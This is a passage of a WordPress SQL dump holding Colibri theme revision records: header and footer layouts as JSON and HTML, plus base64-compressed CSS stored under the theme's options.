rtialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2024-11-07 12:22:15','2024-11-07 17:22:15','',26,'https://gsudice.dataconn.net/?p=1839',0,'revision','',0),(1840,1,'2024-11-07 12:22:15','2024-11-07 17:22:15','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2024-11-07 12:22:15','2024-11-07 17:22:15','',25,'https://gsudice.dataconn.net/?p=1840',0,'revision','',0),(1841,1,'2024-11-07 12:22:15','2024-11-07 17:22:15','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2024-11-07 12:22:15','2024-11-07 17:22:15','',29,'https://gsudice.dataconn.net/?p=1841',0,'revision','',0),(1842,1,'2024-11-07 12:22:15','2024-11-07 17:22:15','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2024-11-07 12:22:15','2024-11-07 17:22:15','',28,'https://gsudice.dataconn.net/?p=1842',0,'revision','',0),(1843,1,'2024-11-07 12:22:25','2024-11-07 17:22:25','{\n    \"colibri-wp::page_content\": {\n        \"value\": {\n            \"options\": {\n                \"css_by_partials_id\": \"base64colibriH4sIAAAAAAACA91dy3bbOAz9Gi2ZQ4Dga5nHf8xxHKfyqRX31OpM8vddyEmdWLEkkEzBWXhjCxbuBXkJQBLV+JsGEXWD2Jjrxt80iLv9erVTqNUa3n3-sDl87-c-jl8hNogN3jaI3f5+u9ucfG-W+932-ue2QX116F92G3X6n2r-q9-8bFA3-qaxt08N6gb1f9uHvm3MdYMatG7QNqgbc3LA427zPPyuj5-Vr37-7hDVHdTlw-zdcDQ2-m5w-sQzKoCWxKINBdAGqWj9ZbCXQPlJTPYLIC0Phl8ei0sMEp9BqpRBysug5TNoK2XQJjL4SuIgSB8WKFQtOianqFp0ckjtV-e7TZ-P8fApqQtjOO9086cBqhZjQsxirTGLXxuzmDdmZjIRPLchfpg-Ed4sUfzIw9lv3epZnfOUISiTqOD40Rcg-TlmzKnzKCQIpCvl7xKazxF5PiJfwbg6BwyGjxiMhCAunyuf+f2XKwlULSTMKHCVRsOJicZbRmhHMkLLX3VsDavOqfetelr9u-226rf7p38O-Xb9-eUiqNtJ8woJWTyY7Rcsw9KilD2tsPy0wspMK6xqAx9R+D8KR0gYkqG+PMuqNnv-16pWaP-XqhZ8AbReKlpMECxJjaJF4Uju3LwlW2Ek2QrqkZtsBfVI4jJKA+cgDagusyoYUJ0wUXh4eVp127UyoLqLTeqrw7bf-AH0zk61m+23tv+Iqds+vf5irhvURusfz1Mz1oDqmGW+AdWJVCEDqgNY1kYzoLqp6n-UxjFswnIbBH6QEESo6ggokwDKCAVlEiJlQJ5W04hWU36tJrlaTUytptxaTXytJqlaTdO6ewkUiJQBUh3YBFBWKqi4cOWi6ZVr1GbOSvymUH5EobzqTGaF8qoz4uSZRu4nI50dPGlJ4E9GC+kJcb6MyUrFtDQXJa266a7KiI1j2ITlNtMqsHxAorxsiczIdDTqwCzfyaiDvPKd3AhIxwfpJIKEsRuhAJF9e95gW2F-a6bjs+9yAUS1DgkkhlpJnHY8LuEQIIFEgFpZnOH5MhoxhUaslkbM1LIGdGNK6aYfavjcPzfr6QWJzM7zfP4AdSnz3FU7z+d5vmDNcWrNvZ-oaFwtjy43jzGFx1gtjzHvtMaQQCOGWmnEkHk4mhR5NNXKo4G8w9FQCo1ULY2UmUabQqOtlkabeVZTSu5I1eaOlDl3pBRxpGrFkXLnjuRTePTV8ugz82hTxqOtdjzaxMX6rdYOY13JgGoNZPN22F--VeIVksE3q0sgtlouYlp4teaICFhW3Gr5aL34KUwBU3Wu6-M1L6Bau1hgnLoodpj6Ekrk5QpRgAJ4A8jF60vg9WLxRlMAbzRy8ZbQqyhXr0BTiURCk1zEUCR1AsGp0-SNLizETi5ixBKIEQUjDkUQB7mITRHlMnKVy3MqIK8ZRiEwjCJxSi2tWVaWYwWsYnD6EcbR+WhYVpFjZThsBOScit1TPVpXWxln7aoGVGtwRfIQJzgPcUXadE5wm84XibEXHOMiDRAQ3AGBUCTGQXCMQ5EYB8ExjkViHAXHOBaJcZQc41gEsdzeDxbp-aDg3g-qWASx4P6eY9U8gWfFukQXWeeKnHMhq9pEVrWJwKpsHYtDz+KQ1VBA7tO9r9a1loBzXF9WApaQX8GN9yI5lORyt0i1K3dxLdFzF9xyL9JxF9xwL9JvF9xupxJ6RXL1ikroFcnVK1tCr6xcvbIl9MrK1SuEEvfqIMi9WYdVpnCuOLEuOBGnRiHOxTfLufZmI6sYCqxLiqxqjeMfhwmXUuC5aus7l+s1Qh-646+nsPztM4KdU9gZc2WMPGpt3h00gmW-Z22wrZhHn2mEEsWRbWwoskfoYCtvtx47tieRNWoNuTcJG-5U5JZa1sxpRowYUQGOSCxFrgBaJxYt8wH8wXbGEn-lxL0hbabvPtMb0maebp5iOz2yObrTga3Yg628rcesH5FssN7ws6fBWBJUf-cbjhIf8RJ5AAA=\",\n                \"css_by_rule_id\": \"base64colibriH4sIAAAAAAACA+0dTY+jOvK37MFS90pExuBAjj2ZF2lGu3pavcu+vYwcMIlnCEbgdCfz6-cASRPAYBMgSTfSTCedVJtyuapcnzZwvgCELBsgBKwX4HwBCPk0-SV4nH+EEEAIoCVASJB1SEX18x1fs5BefO58zb6ycPPIlsdDtk4YQHCWimNIDQsDBIHzBeBlBBAECJKI7YhgPDL8fUIE4xGwXgCCcIZTYBUAY+L7LNoYgscZBILxoRYiYZutyGBMLIFZcyH4rmWgkAaycdbE+7VJ+D7yDY+HPMnAREKiNCYJjYQMmu3IhmbQEY-oCcz5mkEXSbY1IvLKNkQwHv1IBfN+HS8puWyFl5K9Hn+ArCAIgiDQxL5+gUyoQPwK0JofjHRLfP6WM0J8OP+0C++TzZo8QYCW5-8z-AwQLFNUl71VmLYyVZWZFmDGXu2+8C2I-nwwpeJoKxWnPF9BD8IgIdvkysSjkaDJxYy39F1LkL3gF1-uWGQUAfZRSsW1jFWYoqs9RTcXvdJEd+RwgajTwmSn0QCCs5BvuCHoQZQHLSmEeeAGRHFQUmHTwpc6D61qIUEPwvCpx4u7REUJBTwSRsp+50oK2dcI3Zno6qLX0zq14FVL6fa-KS2AxqxUH9hxuSGEEEK95e5BDBfaYrh4ME1jQ90p2rA8xSJ6uHZT6IydqY2d+WgLgLSniACCwPojQ89nr+dfZzmssaPR3vB4JAiLaHL+fh9eQAAEQ1b4Mhuw8BE5v0tfNxLFfQtsAIIzkiT8zXhLSBxnY0qUR7JZPyGcWUew+Oa5fccacm4hm3n7JKGR+BGTDf3BBN3dD+GtP2QoWi9b-loY7NaoKtKxzC+PQdKH4-Lb6o-O+qImMIBbXf4yRGE51iHxfo2tX+5In9y1-rhPfTGAfvgAXH2iSlGXWi-AelnTgCe0yRItRzDemC+2p5ASBAjXhILGn0zFDUw2LKoNw4yA4yzlIfMN4gn2So0LyQhZRncSiBZxOM+l+E--QfULXB+VfNsyQbtEJNc88WliCB4bBfaoBhzPUKk4hgqDhTQQRkJ8tk-zIQHCMuCEbbZq0BlkO6YZnAKuWTRPYcQcUH1IZQrk8OpECGmgQoOQBlISjCFKGRp0FGlSepaOQCWb9ZNrZkakCU-WJHSeuwhZUSlbo+qzBjP8cjN15AFC05ZviMlm-TSHGXXmOZVcW9nkHt7XONsN0tn26kMMv2o1ptDyExF4dNf0XujchFmBJ66Q47tcmNNHTqcsasHuR50yrVXvADXYRr1ZUCOYOWajmXPJGuTJRC5Ay+LPGXpWM5NSHjJ-IDOmZQNv5ugryg5upGKVqhMsaFGH3OGGtfyoNBwzrHtne5Bk55k09KSh9eWsJ4U8kBAMXBqWx70aIpU5hDxQ2VQWhuMDQBBdloVlMYbiywzaz7ePCtZ7pAHZsfCYTe3PmEYAwb9IlFZrW94K7va8rmZCJCRKA57kOmUfxzTxSNpYJlOxnkMW0Yu0uDnDdHcJQoWgiZHGxGPRpl6GulUS9azxu3tzjTGS0fG-lXf8Ueh3e--3an-3w2uJq7mmf6WtmL+R7HNIAiIptK3fC6XGo5YJ2pMFCseO8TZJzY2lViKrE5vcgk2KK-BznwoWHA2PR4JGOUpBSA8GjfzOhbd3kT5SwLD-rJJy5e+9kugOsm59uoTjsKnEfRmfGZT8qJIZ4eTGwyK3JhB6vpKi41jUmtS9sZmvFE+8BW0VvKVpya+i1cSGfTudd4egLL0xPjdcScb78+dVmPeKthNLu+3EMngQpF5CaaRszyCEvlh2l4hwIfBu5VHcf7BdzBNBIqHgOBSw-fOVJiE5Kpc+1XQN9xajt-Jy9K2xJbv1PtnQxGAejzSRq4ldm8+jVEDK6oEbskjSDEttqaSpWSxp9lQuqTKxSj5LOjXdykqVp2vkrmRVmKZ+HabZSyWmyvzKmbTq7AIWhrKS30osA7eHMlQOf9AvmS+QBJUjosVgaF3v8RUafbBTPGw82Mhz7V1o-mj9ndqnFdhOn638ttOUvnCG77rXN7Qd7a76vkjWglcHm9y5oqte-YEdl-M2XfW2O5g60e7Xtx+tXx9r9+tjCO6oXfwW2Og00srtCpVarfpUi1w5D0mNqxtC8c2L6u4C1T4bRu+OpJ9ALm6ro-psSUcdqj-123f75dE70kF3rXPuU8eM05T+iHw9YFehQmjDRCo1GKiVrPbVxeKXDoULXejCa0KCnWN2jU+-Jm6nXIjeiMFAdeeqj28Mrd1WZjpUXWL4EboOJzmf5PwDyvm0F04y8nFl5B6aDm6BybTdTaL8oKJ8RbDdHCpTgdFgI1uDjTxYghkPlmDGg51Cj7XzuthpOq5OL5HU2jw5QJn5FXc4YLWorwMQ3Jr9nDafDYb6HMzqczC7z8Fwn4PNexws7jLWFUI5WGoZa6eW8cLge1E1mQpbIC4dQ5mZVCE9nE-Ag7BONRi71GgGa1iWR8t4z+FQa4rm2uVHaD5XPw2hUSG3lI5eMytHf1aVram8qKb0oqTzTmCp7ARWr-cDoLk7HHM0SvyZcot3z2trHGscrn8C6yXi4glYLyFJheFtWeg-SzpCNa4DukDggeQZOcMJtDMcO7jDYe1q35KGXNyzLSnVYiu8ell9HV+LuT1b7nVEnEuksOl+uEpTdRGieg0WcvW1sdt6XVX29BFWv9MeJnEUcLmMvDYVLAO6CAFJhypmjMswpRMtREKiNCSC-vdpDhB+Ln709xMEqNT2cf5zgydswy6Va+HNGOdv1TZOYPmQ1ap+3BR-eswTpnHjwMok6O3Yr9rzqLKTqEzVA6lMrRsLlXRJjQevIJhykbs89qFdMKsjyQUTtwhmiSBKSr-LXYAdaQZ7o5mGMoMqyqyyixUfULeLufq7mAsQnAl6EKdSICMgkXc8FVXBmIhteS1SkfBftKlAPYMwQhbRn-ykhVnEBCOhDNAjcStcQeLdXl0Ud6FPukUWOlnKv80jZS0QqBXCaoWwWyFwK8Rcx6BpcHbcxSfgqU-JEOVrOYvnhHXR8hPBLhX4QrtvBC1g7emfIUtzw8cQxzh-vM9ST0F+FxAgyBWHpB7bvctVD5p4YerTYNzrJMsOVsxT9t6GVfY1JH-0zhQef5WDFZy3fRI+AbwECG2FiDPzeAXQapPufebRmU8E8XgUzSIqAFq9xedjs9BqH4ec+ClAKwQRAmgFEUArL+FxTH3j9EqP361vP-nx31--Y-9r+Z0X3v-+Gy3e-vfXt-m33erNW35fGObsja7jDCFpUzsRgnjb3fnsrtRLeBjKoBMaUyJOlvr511Zz3cxeLNjJXq89661qy9XE-nQMPmNyXyf3dYjrkTQMlBo9KefXAby66vPLetbCkuMR3w9hlMhl8ehDBdGVwdT7WvrOXE6+hq0e6W9zaKxw8q2SYgtr8HDywhohnLyw9RfXnmwYXRvGLtgwPktJKmhiGqlHQuob5uxnvPko5slvg0X+qZTAHNdymQyXyXC5teFiqxsuQ9gt9qexW1rNFv0s+AJPidJRE6VDu5q9Z8ymnWDaCVR3AvzImdJBnGo8pUrvZLut2y-1i1cX8yklCxBCC-1s9sLtPxni3iYZ4nz9P24mg+v3lQAA\",\n                \"global_css\": 